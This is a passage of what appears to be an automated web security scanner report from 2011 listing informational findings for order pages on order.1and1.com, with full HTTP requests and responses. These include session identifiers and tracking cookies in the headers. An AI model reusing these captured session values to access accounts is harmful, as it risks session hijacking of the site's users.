...[SNIP]...
<span class="container"><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/9/99/none/month-star.png" alt="$ 9.99"></span>
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=f933cb0d2dddc861112b1d01266184f9&amp;__ts=1300632652931"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...

4.5. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...

4.6. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:23:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:37:28 GMT; Path=/
ETag: dbd3f57bd7c94c04d5bf8f590fd16409
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23827


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=24c252289914c20b17cccb226c63acc5&amp;__ts=1300645401904"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...

4.7. http://order.1and1.com/xml/order/LocalSubmission  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:48:32 GMT; Path=/
ETag: 9f251cbbda88124ff22e04dd6b22412a
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18612


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="153" height="99" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/9/99/none/month-star.png" alt="ab 9.99 &#8364;/Monat*"></span>
...[SNIP]...

4.8. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="114" height="73" src="//img.1und1.de/OdinPrice/blue/xl/dollar/6/99/none/month.png" alt="6.99 &#8364;/month*"></span>
...[SNIP]...
</div><img class="price-graphic alphapng" width="114" height="73" src="//img.1und1.de/OdinPrice/blue/xl/dollar/4/99/none/month.png" alt="4.99 &#8364;/month*"></span>
...[SNIP]...

4.9. http://order.1and1.com/xml/order/MailInstantMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:29 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:36 GMT; Path=/
ETag: 5bfc66b9517d399c2c12a418498321d1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25381


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/0/99/none/none.png" alt="$ 0.99"><span class="text-bottom">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/0/99/none/none.png" alt="$ 0.99"><span class="text-bottom">
...[SNIP]...

4.10. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:52 GMT; Path=/
ETag: 80d79fb7f81c76e6606c17b109cfe0c5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24474


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" id="costs-monthly-total-img" width="69" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month.png" alt="from 0,00 &#8364;/month*"></span>
...[SNIP]...

4.11. http://order.1and1.com/xml/order/MicrosoftExchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:27 GMT; Path=/
ETag: 99e72a9f4366afaae938dfca2d6367b6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26758


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/6/99/none/none.png" alt="only $ 6.99 per month"><span class="text-bottom">
...[SNIP]...
</span><img class="price-graphic alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/6/99/none/none.png" alt="only $ 6.99 per month"><span class="text-bottom">
...[SNIP]...

4.12. http://order.1and1.com/xml/order/MsHosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...

4.13. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="123" height="83" src="//img.1und1.de/OdinPrice/yellow/xl/dollar/0/00/none/month-star.png" alt="ab 0.00 &#8364;/Monat*"><span class="horz-l-price-text offer">
...[SNIP]...
